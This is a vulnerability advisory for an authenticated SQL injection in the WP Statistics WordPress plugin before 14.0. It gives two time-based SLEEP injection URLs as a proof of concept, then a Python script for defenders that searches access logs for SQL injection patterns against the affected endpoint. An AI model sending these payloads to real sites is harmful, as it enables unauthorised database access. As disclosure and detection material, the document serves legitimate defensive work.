wpvulndb WPVDB-ID: 18B7E93F-B038-4F28-918B-4015D62F0EB8
History: Mar 06, 2023 - 12:00 a.m.

WP Statistics < 14.0 - Authenticated SQLi

2023-03-06 00:00:00
wpscan.com
15
Tags: wp statistics, authenticated, sql injection, settings, roles, nonce, delay

EPSS

0.001

Percentile

31.1%

The plugin does not escape a parameter, which could allow authenticated users to perform SQL Injection attacks. By default, the affected feature is available to users with the manage_options capability (admin+); however, the plugin has a setting that allows low-privilege users to access it as well.

PoC

Log in as a user allowed to View WP Statistics (by default admins, but this can be changed in Statistics > Settings > Roles) and get a nonce via https://a.com/wp-admin/admin-ajax.php?action=rest-nonce, then use it in the URLs below, which will result in a 6s delay:

https://a.com/wp-json/wp-statistics/v2/metabox?_wpnonce=XXXX&name=pages-chart&ago=1&type=a' AND (SELECT 42 FROM (SELECT(SLEEP(2)))Ab)--%20Cd

https://a.com/wp-json/wp-statistics/v2/metabox?_wpnonce=XXXX&name=pages-chart&ago=1&ID=1 AND (SELECT 42 FROM (SELECT(SLEEP(2)))Ab)--%20Cd
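For defenders who cannot upgrade immediately, the practical question is whether this endpoint has already been probed. The following Python script is an added example, not part of the wpscan advisory or the WP Statistics plugin: it walks web-server access log lines in Common Log Format (an assumption about your log layout), restricts itself to the `/wp-json/wp-statistics/v2/metabox` path and the `type`, `ID`, `name` and `ago` parameters named above, and flags parameter values that carry generic time-based SQL injection indicators (SLEEP/BENCHMARK calls, a quote followed by AND/OR, SELECT ... FROM, or a `-- ` comment). The log lines and IP addresses are constructed sample data; the indicator patterns are general heuristics, not derived from the plugin's source.

```python
"""Hunt access logs for requests matching the WP Statistics < 14.0 metabox SQLi pattern.

Added example (not advisory or plugin code). Assumes Common Log Format lines.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint and parameters taken from the advisory; the only plugin-specific knowledge used.
VULN_PATH = "/wp-json/wp-statistics/v2/metabox"
WATCHED_PARAMS = ("type", "ID", "name", "ago")

# Generic SQLi indicators applied to the percent-decoded parameter value.
SQLI_INDICATORS = [
    re.compile(r"\bSLEEP\s*\(", re.I),            # MySQL time-based probe
    re.compile(r"\bBENCHMARK\s*\(", re.I),        # CPU-based time probe
    re.compile(r"['\"]\s*(AND|OR)\b", re.I),      # string context broken out of
    re.compile(r"\bSELECT\b.*\bFROM\b", re.I | re.S),
    re.compile(r"--\s|/\*"),                      # comment to discard the query tail
]

# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log (fake nonce, documentation IPs). Lines 2 and 3 mirror the
# advisory's two URLs with spaces percent-encoded as a real client would send them.
SAMPLE_LOG = [
    '203.0.113.10 - - [06/Mar/2023:10:14:02 +0000] "GET /wp-json/wp-statistics/v2/metabox'
    '?_wpnonce=abcd1234&name=pages-chart&ago=1&type=a HTTP/1.1" 200 512',
    '203.0.113.10 - - [06/Mar/2023:10:14:09 +0000] "GET /wp-json/wp-statistics/v2/metabox'
    '?_wpnonce=abcd1234&name=pages-chart&ago=1&type=a%27%20AND%20(SELECT%2042%20FROM%20'
    '(SELECT(SLEEP(2)))Ab)--%20Cd HTTP/1.1" 200 512',
    '198.51.100.7 - - [06/Mar/2023:10:15:00 +0000] "GET /wp-json/wp-statistics/v2/metabox'
    '?_wpnonce=abcd1234&name=pages-chart&ago=1&ID=1%20AND%20(SELECT%2042%20FROM%20'
    '(SELECT(SLEEP(2)))Ab)--%20Cd HTTP/1.1" 200 512',
    # Same keyword on an unrelated endpoint: out of scope for this check.
    '198.51.100.7 - - [06/Mar/2023:10:16:00 +0000] "GET /wp-json/wp/v2/posts'
    '?search=SLEEP(2) HTTP/1.1" 200 2048',
]


def parse_line(line):
    """Return the CLF fields as a dict, or None if the line does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def sqli_indicators(value):
    """Return the indicator patterns that fire on one decoded parameter value."""
    return [p.pattern for p in SQLI_INDICATORS if p.search(value)]


def inspect_request(target):
    """Map each watched parameter with indicators to the patterns that matched.

    Returns {} for requests to other paths or for clean parameter values.
    """
    parts = urlsplit(target)
    if not parts.path.rstrip("/").endswith(VULN_PATH):
        return {}
    findings = {}
    # parse_qs percent-decodes values, so the indicators see the real payload.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in WATCHED_PARAMS:
            continue
        for value in values:
            hits = sqli_indicators(value)
            if hits:
                findings[name] = hits
    return findings


def scan_log(lines):
    """Return one alert dict per suspicious request, in log order."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        findings = inspect_request(rec["target"])
        if findings:
            alerts.append({"ip": rec["ip"], "ts": rec["ts"],
                           "status": rec["status"], "params": findings})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The path check matches on a suffix so installations served from a subdirectory still match; it does not cover REST calls made through `index.php?rest_route=/wp-statistics/v2/metabox`, which WordPress also accepts, so a production version should treat a `rest_route` query parameter as the path as well. A hit tells you only that someone sent an injection payload to the endpoint; whether it succeeded depends on the plugin version and the Roles setting, so pair the alert with a check of which users have View WP Statistics access.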

